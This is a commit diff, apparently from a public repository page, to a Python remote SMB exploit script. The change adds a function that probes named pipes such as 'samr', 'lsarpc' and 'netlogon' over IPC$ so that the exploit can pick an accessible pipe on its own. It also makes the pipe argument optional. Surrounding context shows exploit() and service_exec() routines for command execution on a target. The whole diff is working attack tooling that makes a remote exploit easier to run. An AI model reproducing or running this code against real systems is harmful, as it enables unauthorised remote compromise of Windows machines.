find named pipe if it is omitted
This commit is contained in:
worawit
@@ -269,6 +269,22 @@ def wait_for_request_processed(conn):
|
||||
# send echo is faster than sleep(0.05) when connection is very good
|
||||
conn.send_echo('a')
|
||||
|
||||
def find_named_pipe(conn):
|
||||
pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ]
|
||||
|
||||
tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
|
||||
found_pipe = None
|
||||
for pipe in pipes:
|
||||
try:
|
||||
fid = conn.nt_create_andx(tid, pipe)
|
||||
conn.close(tid, fid)
|
||||
found_pipe = pipe
|
||||
except smb.SessionError, e:
|
||||
pass
|
||||
|
||||
conn.disconnect_tree(tid)
|
||||
return found_pipe
|
||||
|
||||
|
||||
special_mid = 0
|
||||
extra_last_mid = 0
|
||||
@@ -769,6 +785,13 @@ def exploit(target, pipe_name):
|
||||
print('This exploit does not support this target')
|
||||
sys.exit()
|
||||
|
||||
if pipe_name is None:
|
||||
pipe_name = find_named_pipe(conn)
|
||||
if pipe_name is None:
|
||||
print('Not found accessible named pipe')
|
||||
return False
|
||||
print('Using named pipe: '+pipe_name)
|
||||
|
||||
if not info['method'](conn, pipe_name, info):
|
||||
return False
|
||||
|
||||
@@ -921,12 +944,12 @@ def service_exec(conn, cmd):
|
||||
rpcsvc.disconnect()
|
||||
|
||||
|
||||
if len(sys.argv) != 3:
|
||||
print("{} <ip> <pipe_name>".format(sys.argv[0]))
|
||||
if len(sys.argv) < 2:
|
||||
print("{} <ip> [pipe_name]".format(sys.argv[0]))
|
||||
sys.exit(1)
|
||||
|
||||
target = sys.argv[1]
|
||||
pipe_name = sys.argv[2]
|
||||
pipe_name = None if len(sys.argv) < 3 else sys.argv[2]
|
||||
|
||||
exploit(target, pipe_name)
|
||||
print('Done')
|
||||
|
||||
Reference in New Issue
Block a user